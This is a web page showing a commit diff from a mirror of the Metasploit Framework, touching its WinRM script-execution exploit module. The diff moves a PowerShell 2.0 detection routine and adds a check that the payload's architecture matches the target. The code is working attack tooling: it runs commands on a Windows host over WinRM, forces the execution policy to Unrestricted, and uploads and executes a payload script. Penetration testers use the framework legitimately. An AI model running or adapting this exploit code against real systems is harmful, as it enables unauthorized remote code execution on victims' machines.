infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Hopefully final touches 

Some smftidy cleanup, and added a method to check that the payload is
the correct arch when using the powershell method
bug/bundler_fix
David Maloney 2012-11-05 10:06:57 -06:00
parent 25a6e983a1
commit 7c141e11c4
1 changed files with 79 additions and 47 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

126
modules/exploits/windows/winrm/winrm_script_exec.rb
View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
delivery: Powershell 2.0 and VBS CmdStager. delivery: Powershell 2.0 and VBS CmdStager.
The module will check if Powershell 2.0 is available, and if so uses The module will check if Powershell 2.0 is available, and if so uses
that method. Otherwise it falls back to the VBS Cmdstager which is that method. Otherwise it falls back to the VBS Cmdstager which is
less stealthy. less stealthy.
IMPORTANT: If targeting an x64 system with the Powershell method IMPORTANT: If targeting an x64 system with the Powershell method
@ -78,57 +78,13 @@ class Metasploit3 < Msf::Exploit::Remote
return Msf::Exploit::CheckCode::Vulnerable return Msf::Exploit::CheckCode::Vulnerable
end end
def powershell2?
if datastore['FORCE_VBS']
print_status "User selected the FORCE_VBS option"
return false
end
print_status "checking for Powershell 2.0"
streams = winrm_run_cmd("powershell Get-Host")
if streams == 401
print_error "Login failed!"
return false
end
unless streams.class == Hash
print_error "Recieved error while running check"
return false
end
if streams['stderr'].include? "not recognized"
print_error "Powershell is not installed"
return false
end
streams['stdout'].each_line do |line|
next unless line.start_with? "Version"
major_version = line.match(/\d(?=\.)/)[0]
if major_version == 1
print_error "The target is running an older version of powershell"
return false
end
end
print_status "Attempting to set Execution Policy"
streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
if streams == 401
print_error "Login failed!"
return false
end
unless streams.class == Hash
print_error "Recieved error while running check"
return false
end
streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
if streams['stdout'].include? 'Unrestricted'
print_good "Set Execution Policy Successfully"
return true
end
return false
end
def exploit def exploit
unless check == Msf::Exploit::CheckCode::Vulnerable unless check == Msf::Exploit::CheckCode::Vulnerable
return return
end end
if powershell2? if powershell2?
return unless correct_payload_arch?
path = upload_script path = upload_script
return if path.nil? return if path.nil?
exec_script(path) exec_script(path)
@ -203,6 +159,82 @@ class Metasploit3 < Msf::Exploit::Remote
return streams['stdout'].chomp return streams['stdout'].chomp
end end
def check_remote_arch
wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
resp,c = send_request_ntlm(winrm_wql_msg(wql))
#Default to x86 if we can't be sure
return "x86" if resp.nil? or resp.code != 200
resp_tbl = parse_wql_response(resp)
addr_width = resp_tbl.rows.flatten[0]
if addr_width == "64"
return "x64"
else
return "x86"
end
end
def correct_payload_arch?
target_arch = check_remote_arch
case target_arch
when "x64"
unless datastore['PAYLOAD'].include? "x64"
print_error "You selected an x86 payload for an x64 target!"
return false
end
when "x86"
if datastore['PAYLOAD'].include? "x64"
print_error "you selected an x64 payload for an x86 target"
return false
end
end
return true
end
def powershell2?
if datastore['FORCE_VBS']
print_status "User selected the FORCE_VBS option"
return false
end
print_status "checking for Powershell 2.0"
streams = winrm_run_cmd("powershell Get-Host")
if streams == 401
print_error "Login failed!"
return false
end
unless streams.class == Hash
print_error "Recieved error while running check"
return false
end
if streams['stderr'].include? "not recognized"
print_error "Powershell is not installed"
return false
end
streams['stdout'].each_line do |line|
next unless line.start_with? "Version"
major_version = line.match(/\d(?=\.)/)[0]
if major_version == 1
print_error "The target is running an older version of powershell"
return false
end
end
print_status "Attempting to set Execution Policy"
streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
if streams == 401
print_error "Login failed!"
return false
end
unless streams.class == Hash
print_error "Recieved error while running check"
return false
end
streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
if streams['stdout'].include? 'Unrestricted'
print_good "Set Execution Policy Successfully"
return true
end
return false
end
end end